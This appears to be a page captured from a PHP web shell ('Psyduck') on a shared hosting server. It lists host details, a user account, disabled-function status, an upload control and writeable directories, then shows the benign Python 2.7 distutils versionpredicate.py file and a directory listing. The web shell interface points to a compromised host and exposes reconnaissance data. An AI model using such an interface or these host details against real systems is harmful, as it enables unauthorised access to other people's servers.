Psyduck - 可達鴨 之 鴨力山大2


Server : LiteSpeed
System : Linux premium217.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User : alloknri ( 880)
PHP Version : 8.1.34
Disable Function : NONE
Directory :  /lib64/python2.7/distutils/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //lib64/python2.7/distutils/versionpredicate.py
"""Module for parsing and testing package version predicate strings.
"""
import re
import distutils.version
import operator


re_validPackage = re.compile(r"(?i)^\s*([a-z_]\w*(?:\.[a-z_]\w*)*)(.*)")
# (package) (rest)

re_paren = re.compile(r"^\s*\((.*)\)\s*$") # (list) inside of parentheses
re_splitComparison = re.compile(r"^\s*(<=|>=|<|>|!=|==)\s*([^\s,]+)\s*$")
# (comp) (version)


def splitUp(pred):
    """Parse a single version comparison.

    Return (comparison string, StrictVersion)
    """
    res = re_splitComparison.match(pred)
    if not res:
        raise ValueError("bad package restriction syntax: %r" % pred)
    comp, verStr = res.groups()
    return (comp, distutils.version.StrictVersion(verStr))

compmap = {"<": operator.lt, "<=": operator.le, "==": operator.eq,
           ">": operator.gt, ">=": operator.ge, "!=": operator.ne}

class VersionPredicate:
    """Parse and test package version predicates.

    >>> v = VersionPredicate('pyepat.abc (>1.0, <3333.3a1, !=1555.1b3)')

    The `name` attribute provides the full dotted name that is given::

    >>> v.name
    'pyepat.abc'

    The str() of a `VersionPredicate` provides a normalized
    human-readable version of the expression::

    >>> print v
    pyepat.abc (> 1.0, < 3333.3a1, != 1555.1b3)

    The `satisfied_by()` method can be used to determine with a given
    version number is included in the set described by the version
    restrictions::

    >>> v.satisfied_by('1.1')
    True
    >>> v.satisfied_by('1.4')
    True
    >>> v.satisfied_by('1.0')
    False
    >>> v.satisfied_by('4444.4')
    False
    >>> v.satisfied_by('1555.1b3')
    False

    `VersionPredicate` is flexible in accepting extra whitespace::

    >>> v = VersionPredicate(' pat( ==  0.1  )  ')
    >>> v.name
    'pat'
    >>> v.satisfied_by('0.1')
    True
    >>> v.satisfied_by('0.2')
    False

    If any version numbers passed in do not conform to the
    restrictions of `StrictVersion`, a `ValueError` is raised::

    >>> v = VersionPredicate('p1.p2.p3.p4(>=1.0, <=1.3a1, !=1.2zb3)')
    Traceback (most recent call last):
      ...
    ValueError: invalid version number '1.2zb3'

    It the module or package name given does not conform to what's
    allowed as a legal module or package name, `ValueError` is
    raised::

    >>> v = VersionPredicate('foo-bar')
    Traceback (most recent call last):
      ...
    ValueError: expected parenthesized list: '-bar'

    >>> v = VersionPredicate('foo bar (12.21)')
    Traceback (most recent call last):
      ...
    ValueError: expected parenthesized list: 'bar (12.21)'

    """

    def __init__(self, versionPredicateStr):
        """Parse a version predicate string.
        """
        # Fields:
        #    name:  package name
        #    pred:  list of (comparison string, StrictVersion)

        versionPredicateStr = versionPredicateStr.strip()
        if not versionPredicateStr:
            raise ValueError("empty package restriction")
        match = re_validPackage.match(versionPredicateStr)
        if not match:
            raise ValueError("bad package name in %r" % versionPredicateStr)
        self.name, paren = match.groups()
        paren = paren.strip()
        if paren:
            match = re_paren.match(paren)
            if not match:
                raise ValueError("expected parenthesized list: %r" % paren)
            str = match.groups()[0]
            self.pred = [splitUp(aPred) for aPred in str.split(",")]
            if not self.pred:
                raise ValueError("empty parenthesized list in %r"
                                 % versionPredicateStr)
        else:
            self.pred = []

    def __str__(self):
        if self.pred:
            seq = [cond + " " + str(ver) for cond, ver in self.pred]
            return self.name + " (" + ", ".join(seq) + ")"
        else:
            return self.name

    def satisfied_by(self, version):
        """True if version is compatible with all the predicates in self.
        The parameter version must be acceptable to the StrictVersion
        constructor.  It may be either a string or StrictVersion.
        """
        for cond, ver in self.pred:
            if not compmap[cond](version, ver):
                return False
        return True


_provision_rx = None

def split_provision(value):
    """Return the name and optional version number of a provision.

    The version number, if given, will be returned as a `StrictVersion`
    instance, otherwise it will be `None`.

    >>> split_provision('mypkg')
    ('mypkg', None)
    >>> split_provision(' mypkg( 1.2 ) ')
    ('mypkg', StrictVersion ('1.2'))
    """
    global _provision_rx
    if _provision_rx is None:
        _provision_rx = re.compile(
            "([a-zA-Z_]\w*(?:\.[a-zA-Z_]\w*)*)(?:\s*\(\s*([^)\s]+)\s*\))?$")
    value = value.strip()
    m = _provision_rx.match(value)
    if not m:
        raise ValueError("illegal provides specification: %r" % value)
    ver = m.group(2) or None
    if ver:
        ver = distutils.version.StrictVersion(ver)
    return m.group(1), ver
Name
Size
Permissions
Options
command
--
drwxr-xr-x
README
0.288 KB
-rw-r--r--
__init__.py
0.23 KB
-rw-r--r--
__init__.pyc
0.405 KB
-rw-r--r--
__init__.pyo
0.405 KB
-rw-r--r--
archive_util.py
8.026 KB
-rw-r--r--
archive_util.pyc
7.423 KB
-rw-r--r--
archive_util.pyo
7.423 KB
-rw-r--r--
bcppcompiler.py
14.591 KB
-rw-r--r--
bcppcompiler.pyc
7.697 KB
-rw-r--r--
bcppcompiler.pyo
7.697 KB
-rw-r--r--
ccompiler.py
45.631 KB
-rw-r--r--
ccompiler.pyc
36.018 KB
-rw-r--r--
ccompiler.pyo
35.88 KB
-rw-r--r--
cmd.py
18.818 KB
-rw-r--r--
cmd.pyc
16.41 KB
-rw-r--r--
cmd.pyo
16.41 KB
-rw-r--r--
config.py
4.037 KB
-rw-r--r--
config.pyc
3.481 KB
-rw-r--r--
config.pyo
3.481 KB
-rw-r--r--
core.py
8.808 KB
-rw-r--r--
core.pyc
7.359 KB
-rw-r--r--
core.pyo
7.359 KB
-rw-r--r--
cygwinccompiler.py
17.319 KB
-rw-r--r--
cygwinccompiler.pyc
9.595 KB
-rw-r--r--
cygwinccompiler.pyo
9.595 KB
-rw-r--r--
debug.py
0.158 KB
-rw-r--r--
debug.pyc
0.248 KB
-rw-r--r--
debug.pyo
0.248 KB
-rw-r--r--
dep_util.py
3.427 KB
-rw-r--r--
dep_util.pyc
3.105 KB
-rw-r--r--
dep_util.pyo
3.105 KB
-rw-r--r--
dir_util.py
7.684 KB
-rw-r--r--
dir_util.pyc
6.627 KB
-rw-r--r--
dir_util.pyo
6.627 KB
-rw-r--r--
dist.py
48.876 KB
-rw-r--r--
dist.pyc
38.258 KB
-rw-r--r--
dist.pyo
38.258 KB
-rw-r--r--
emxccompiler.py
11.651 KB
-rw-r--r--
emxccompiler.pyc
7.292 KB
-rw-r--r--
emxccompiler.pyo
7.292 KB
-rw-r--r--
errors.py
3.412 KB
-rw-r--r--
errors.pyc
6.138 KB
-rw-r--r--
errors.pyo
6.138 KB
-rw-r--r--
extension.py
10.648 KB
-rw-r--r--
extension.pyc
7.238 KB
-rw-r--r--
extension.pyo
7.018 KB
-rw-r--r--
fancy_getopt.py
17.527 KB
-rw-r--r--
fancy_getopt.pyc
11.678 KB
-rw-r--r--
fancy_getopt.pyo
11.505 KB
-rw-r--r--
file_util.py
7.94 KB
-rw-r--r--
file_util.pyc
6.592 KB
-rw-r--r--
file_util.pyo
6.592 KB
-rw-r--r--
filelist.py
12.392 KB
-rw-r--r--
filelist.pyc
10.504 KB
-rw-r--r--
filelist.pyo
10.504 KB
-rw-r--r--
log.py
1.646 KB
-rw-r--r--
log.pyc
2.721 KB
-rw-r--r--
log.pyo
2.721 KB
-rw-r--r--
msvc9compiler.py
30.277 KB
-rw-r--r--
msvc9compiler.pyc
20.993 KB
-rw-r--r--
msvc9compiler.pyo
20.922 KB
-rw-r--r--
msvccompiler.py
23.083 KB
-rw-r--r--
msvccompiler.pyc
17.114 KB
-rw-r--r--
msvccompiler.pyo
17.114 KB
-rw-r--r--
spawn.py
8.445 KB
-rw-r--r--
spawn.pyc
6.276 KB
-rw-r--r--
spawn.pyo
6.276 KB
-rw-r--r--
sysconfig.py
17.292 KB
-rw-r--r--
sysconfig.py.debug-build
17.209 KB
-rw-r--r--
sysconfig.pyc
13.09 KB
-rw-r--r--
sysconfig.pyo
13.09 KB
-rw-r--r--
text_file.py
12.137 KB
-rw-r--r--
text_file.pyc
9.042 KB
-rw-r--r--
text_file.pyo
9.042 KB
-rw-r--r--
unixccompiler.py
13.889 KB
-rw-r--r--
unixccompiler.py.distutils-rpath
13.356 KB
-rw-r--r--
unixccompiler.pyc
8.036 KB
-rw-r--r--
unixccompiler.pyo
8.036 KB
-rw-r--r--
util.py
17.809 KB
-rw-r--r--
util.pyc
14.049 KB
-rw-r--r--
util.pyo
14.049 KB
-rw-r--r--
version.py
11.165 KB
-rw-r--r--
version.pyc
7.039 KB
-rw-r--r--
version.pyo
7.039 KB
-rw-r--r--
versionpredicate.py
4.976 KB
-rw-r--r--
versionpredicate.pyc
5.412 KB
-rw-r--r--
versionpredicate.pyo
5.412 KB
-rw-r--r--